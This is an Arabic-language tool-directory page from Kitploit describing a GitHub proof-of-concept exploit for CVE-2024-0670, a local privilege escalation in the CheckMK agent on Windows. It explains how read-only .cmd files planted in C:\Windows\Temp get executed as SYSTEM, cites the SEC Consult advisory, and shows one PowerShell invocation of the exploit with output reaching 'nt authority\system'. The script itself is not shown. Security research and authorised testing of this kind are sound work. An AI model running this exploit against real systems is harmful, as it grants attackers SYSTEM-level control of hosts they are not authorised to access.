Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-0670 — PoC لـ CVE-2024-0670 | Kitploit
أدوات/GitHubGitHub/magicrc/cve-2024-0670
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليم
GitHubmagicrc/cve-2024-0670

CVE-2024-0670

PoC لـ CVE-2024-0670

عرض المستودع
1منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2024-0670 إثبات المفهوم

يوفر هذا المستودع استغلالًا لإثبات المفهوم (PoC) لثغرة CVE-2024-0670، التي تؤثر على وكيل CheckMK في أنظمة Windows. تحدث الثغرة عندما يقوم وكيل CheckMK بإنشاء وتنفيذ ملفات مؤقتة في دليل C:\Windows\Temp. يمكن للمهاجم إساءة استخدام هذا السلوك عن طريق وضع ملفات خبيثة مسبقًا في هذا الدليل مع تفعيل الحماية ضد الكتابة. عندما يحاول الوكيل إنشاء ملف مؤقت موجود بالفعل كملف للقراءة فقط، يفشل في استبداله لكنه يظل ينفذ الملف الموجود بصلاحيات SYSTEM، مما يتيح تصعيد الامتيازات.

مرجع الاستشارة: SEC Consult - تصعيد محلي للامتيازات عبر ملفات قابلة للكتابة في وكيل Checkmk


⚠️ إخلاء مسؤولية

هذا المشروع مخصص لأغراض التعليم والبحث والاختبارات الأمنية المصرّح بها فقط.
لا تستخدم هذا الكود على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
المؤلف ليس مسؤولًا عن أي ضرر أو إساءة استخدام.


الاستخدام

root@kitploit:~
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"

مثال

root@kitploit:~
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer... 
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system
تنزيل الأداة